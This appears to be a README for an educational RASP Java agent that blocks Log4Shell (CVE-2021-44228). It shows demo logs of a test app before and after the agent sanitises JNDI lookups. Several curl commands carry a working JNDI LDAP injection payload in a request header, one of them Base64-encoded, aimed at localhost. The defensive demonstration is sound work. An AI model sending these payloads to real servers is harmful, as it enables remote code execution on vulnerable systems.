RASP for CVE-2021-44228 (for educational purposes only).
- Java (AdoptOpenJDK 11.0.8)
==================== Run Application ====================
$ java -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
(...snip...)
2021-12-21 20:38:15.353 INFO 44920 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
2021-12-21 20:38:15.363 INFO 44920 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 1.896 seconds (JVM running for 2.912)
==================== Send payload ====================
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'
==================== Application logs ====================
2021-12-21 20:38:15.353 INFO 44920 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
2021-12-21 20:38:15.363 INFO 44920 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 1.896 seconds (JVM running for 2.912)
12月 21, 2021 8:39:07 午後 org.apache.catalina.core.ApplicationContext log
情報: Initializing Spring DispatcherServlet 'dispatcherServlet'
2021-12-21 20:39:07.962 INFO 45042 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
2021-12-21 20:39:07.964 INFO 45042 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 1 ms
-------HACKED------ ⭐️ Success Attack ⭐️
2021-12-21 20:39:07.995 INFO 45042 --- [nio-8080-exec-1] MainController
==================== Run Application ====================
$ java -javaagent:./lib/cve_2021_44228_rasp-jar-with-dependencies.jar -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
Loading CVE-2021-44228 RASP ⭐️ Loaded RASP ⭐️
(...snip...)
2021-12-21 20:51:12.335 INFO 45330 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
2021-12-21 20:51:12.347 INFO 45330 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 2.02 seconds (JVM running for 3.163)
==================== Send payload ====================
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'
==================== Application logs ====================
12月 21, 2021 8:51:59 午後 org.apache.catalina.core.ApplicationContext log
情報: Initializing Spring DispatcherServlet 'dispatcherServlet'
2021-12-21 20:51:59.158 INFO 45330 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
2021-12-21 20:51:59.159 INFO 45330 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 1 ms
Before : ldap://127.0.0.1:1389/a
JndiLookupTransformer#sanitizing
After : ldap:xx127.0.0.1:1389xa ⭐️ "javax.naming.CommunicationException" occurred. ⭐️
2021-12-21 20:51:59,226 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap:xx127.0.0.1:1389xa]. javax.naming.CommunicationException: localhost:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:237)
at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1610)
at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2751)
at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:319)
at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204)
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
(...snip...)
2021-12-21 20:51:59.191 INFO 45330 --- [nio-8080-exec-1] MainController : Received a request for API version ${jndi:ldap://127.0.0.1:1389/a}
$ mvn clean package
$ ls target/cve_2021_44228_rasp-jar-with-dependencies.jar
$ mv target/cve_2021_44228_rasp-jar-with-dependencies.jar ../web_application/lib
$ ./gradlew bootJar
$ ls build/libs/web_application-0.0.1-SNAPSHOT.jar
$ java -javaagent:./lib/cve_2021_44228_rasp-jar-with-dependencies.jar -jar build/libs/web_application-0.0.1-SNAPSHOT.jar
# Attack
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/a}'
# Base64 Attack
$ curl 127.0.0.1:8080/base64 -H 'X-Api-Version: JHtqbmRpOmxkYXA6Ly8xMjcuMC4wLjE6MTM4OS9hfQ=='